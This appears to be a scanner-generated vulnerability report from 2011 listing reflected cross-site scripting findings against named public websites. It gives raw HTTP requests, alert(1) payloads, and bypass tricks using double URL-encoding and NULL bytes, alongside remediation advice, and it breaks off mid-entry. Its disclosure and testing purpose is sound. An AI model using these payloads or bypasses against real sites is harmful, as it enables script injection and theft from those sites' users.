This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/xml/i/8334ea93-781f-4bce-bc32-094c3ddcee36f6ed4<a>4e2f98ce392/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d756/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Date: Sun, 04 Sep 2011 12:21:41 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web16 Content-Length: 1696
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 571a5%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ee21715199ab was submitted in the REST URL parameter 18. This input was echoed as 571a5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>e21715199ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /syndication/xml/i/a43042dd-c472-4930-a919-f43bb2d1f2bf/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f571a5%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ee21715199ab/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Date: Sun, 04 Sep 2011 12:23:12 GMT Expires: Wed, 07 Sep 2011 12:22:12 GMT ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506]; P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web04 Content-Length: 3473
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cb5e<a>fa25a69a60 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/xml/i/a43042dd-c472-4930-a919-f43bb2d1f2bf6cb5e<a>fa25a69a60/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Date: Sun, 04 Sep 2011 12:21:55 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding X-WBX: web03 Content-Length: 1695
1.21. http://corporate.digitalriver.com/store [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://corporate.digitalriver.com
Path:
/store
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 87700-->42ee04a8087 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=114053839011,0) Date: Sun, 04 Sep 2011 14:19:10 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app53 Content-Length: 48029
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?87700-->42ee04a8087=1&Action=DisplayESIPage&CallingPageID=CorpPage&Currency=USD&ESIHC=69e81329&Env=BASE&Locale=en_US&SiteID=digriv&StyleID=27010600&StyleVersion=76&ThemeID=16015700&ceid=173655500&cename=TopHeader&id=Prod ...[SNIP]...
1.22. http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/store/digriv/html/pbPage.Homepage
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload da9c3--><script>alert(1)</script>dd29a7ec5c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008affd"><script>alert(1)</script>0f044f917b8 was submitted in the REST URL parameter 1. This input was echoed as 8affd"><script>alert(1)</script>0f044f917b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%008affd"><script>alert(1)</script>0f044f917b8 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %004394f<script>alert(1)</script>f633f3a958b was submitted in the REST URL parameter 2. This input was echoed as 4394f<script>alert(1)</script>f633f3a958b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /wiki/%004394f<script>alert(1)</script>f633f3a958b/x26amp HTTP/1.1 Host: en.wikipedia.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 04 Sep 2011 14:01:37 GMT Server: Apache Cache-Control: private, s-maxage=0, max-age=0, must-revalidate X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/%004394f<script>alert(1)</script>f633f3a958b/x26amp Content-Length: 5410 Content-Type: text/html; charset=utf-8 X-Cache: MISS from sq61.wikimedia.org X-Cache-Lookup: MISS from sq61.wikimedia.org:3128 X-Cache: MISS from sq38.wikimedia.org X-Cache-Lookup: MISS from sq38.wikimedia.org:80 Connection: close
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Wikimedia page not found: http://en.wikipedia.org/wiki/%004394f<script& ...[SNIP]... <p style="font-weight: bold;">To check for "%004394f<script>alert(1)</script>f633f3a958b/x26amp" on Wikipedia, see: <a href="http://en.wikipedia.org/wiki/%004394f<script> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00aa7a3"><script>alert(1)</script>8cfe4eae7a3 was submitted in the REST URL parameter 2. This input was echoed as aa7a3"><script>alert(1)</script>8cfe4eae7a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /wiki/%00aa7a3"><script>alert(1)</script>8cfe4eae7a3/x26amp HTTP/1.1 Host: en.wikipedia.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 04 Sep 2011 14:01:17 GMT Server: Apache Cache-Control: private, s-maxage=0, max-age=0, must-revalidate X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/%00aa7a3"><script>alert(1)</script>8cfe4eae7a3/x26amp Content-Length: 5438 Content-Type: text/html; charset=utf-8 X-Cache: MISS from sq61.wikimedia.org X-Cache-Lookup: MISS from sq61.wikimedia.org:3128 X-Cache: MISS from sq71.wikimedia.org X-Cache-Lookup: MISS from sq71.wikimedia.org:80 Connection: close
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 4ba19<script>alert(1)</script>049c3a47bdf was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load4ba19<script>alert(1)</script>049c3a47bdf HTTP/1.1 Host: gis1.livechatinc.com Proxy-Connection: keep-alive Referer: http://support.kasperskyamericas.com/corporate/anti-virus-6-r2-mp4-windows-workstations User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 929e6<script>alert(1)</script>6e265ba17ce was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load929e6<script>alert(1)</script>6e265ba17ce HTTP/1.1 Host: gis2.livechatinc.com Proxy-Connection: keep-alive Referer: http://support.kasperskyamericas.com/corporate/contact-information User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload ea3d9<script>alert(1)</script>6b4f76bc96d was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_loadea3d9<script>alert(1)</script>6b4f76bc96d HTTP/1.1 Host: gis3.livechatinc.com Proxy-Connection: keep-alive Referer: http://support.kasperskyamericas.com/corporate/contact-information User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload d4bbe<script>alert(1)</script>ae16b26f03b was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_loadd4bbe<script>alert(1)</script>ae16b26f03b HTTP/1.1 Host: gis4.livechatinc.com Proxy-Connection: keep-alive Referer: http://support.kasperskyamericas.com/corporate/open-support-case User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 6c10a<script>alert(1)</script>adbd0b08f57 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load6c10a<script>alert(1)</script>adbd0b08f57 HTTP/1.1 Host: gis5.livechatinc.com Proxy-Connection: keep-alive Referer: http://support.kasperskyamericas.com/corporate/live-chat User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a6ee3<img%20src%3da%20onerror%3dalert(1)>42547d9da14 was submitted in the REST URL parameter 3. This input was echoed as a6ee3<img src=a onerror=alert(1)>42547d9da14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gifa6ee3<img src=a onerror=alert(1)>42547d9da14. Server: Resin/3.1.8 Content-Type: text/html; charset=utf-8 Date: Sun, 04 Sep 2011 12:17:38 GMT Content-Length: 484
<html> <head><title>404 There is no Action mapped for namespace /activity and action name activity.gifa6ee3<img src=a onerror=alert(1)>42547d9da14.</title></head> <body> <h1>404 There is no Action mapped for namespace /activity and action name activity.gifa6ee3<img src=a onerror=alert(1)>42547d9da14.</h1> ...[SNIP]...
1.32. http://hs.maas360.com/main-site-theme/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://hs.maas360.com
Path:
/main-site-theme/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 59837--><a>584384740af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /main-site-theme/?59837--><a>584384740af=1 HTTP/1.1 Host: hs.maas360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a0f4"-alert(1)-"e305e7e075d was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c74b4'%3balert(1)//f093b248a6a was submitted in the mpck parameter. This input was echoed as c74b4';alert(1)//f093b248a6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3905d"%3balert(1)//ecf698608ec was submitted in the mpvc parameter. This input was echoed as 3905d";alert(1)//ecf698608ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d58f0'%3balert(1)//57142596da5 was submitted in the mpvc parameter. This input was echoed as d58f0';alert(1)//57142596da5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51ff7'%3balert(1)//178d594bd57 was submitted in the mpck parameter. This input was echoed as 51ff7';alert(1)//178d594bd57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 656a0"-alert(1)-"a474aaf0673 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ab5d"%3balert(1)//95b028c6b12 was submitted in the mpvc parameter. This input was echoed as 1ab5d";alert(1)//95b028c6b12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa8f2'%3balert(1)//0f211c345d2 was submitted in the mpvc parameter. This input was echoed as fa8f2';alert(1)//0f211c345d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload dc696<script>alert(1)</script>8652984785e was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=756&ct=COMPUTERWORLD_ROSdc696<script>alert(1)</script>8652984785e&tr=MARKETPLACE&num=5&layt=1&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
// Error: Unknown old section COMPUTERWORLD_ROSdc696<script>alert(1)</script>8652984785e
1.42. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jlinks.industrybrains.com
Path:
/jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3a555<script>alert(1)</script>c347c309378 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=756&ct=COMPUTERWORLD_ROS&tr=MARKETPLACE&num=5&layt=1&fmt=simp&3a555<script>alert(1)</script>c347c309378=1 HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 4f4dc<script>alert(1)</script>88b544abd8e was submitted in the tr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=756&ct=COMPUTERWORLD_ROS&tr=MARKETPLACE4f4dc<script>alert(1)</script>88b544abd8e&num=5&layt=1&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
// Error: Site 756 has no section MARKETPLACE4f4dc<script>alert(1)</script>88b544abd8e
1.44. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4299d"><script>alert(1)</script>5956202a0bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?4299d"><script>alert(1)</script>5956202a0bb=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.45. http://jsc.madisonlogic.com/jsc [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jsc.madisonlogic.com
Path:
/jsc
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 551f2<script>alert(1)</script>1434922bee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 716e8"><script>alert(1)</script>6b13a308d40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Articles716e8"><script>alert(1)</script>6b13a308d40/456878/ HTTP/1.1 Host: lwn.net Proxy-Connection: keep-alive Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 12:13:56 GMT Server: Apache Expires: -1 Content-Length: 4300 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/Articles716e8"><script>alert(1)</script>6b13a308d40/456878/?format=printable" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29d0e"><script>alert(1)</script>6a13f79386a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Articles/45687829d0e"><script>alert(1)</script>6a13f79386a/ HTTP/1.1 Host: lwn.net Proxy-Connection: keep-alive Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 12:14:01 GMT Server: Apache Expires: -1 Content-Length: 4300 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/Articles/45687829d0e"><script>alert(1)</script>6a13f79386a/?format=printable" rel="nofollow"> ...[SNIP]...
1.48. http://lwn.net/Articles/456878/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://lwn.net
Path:
/Articles/456878/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de815"><script>alert(1)</script>abe18a1863 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
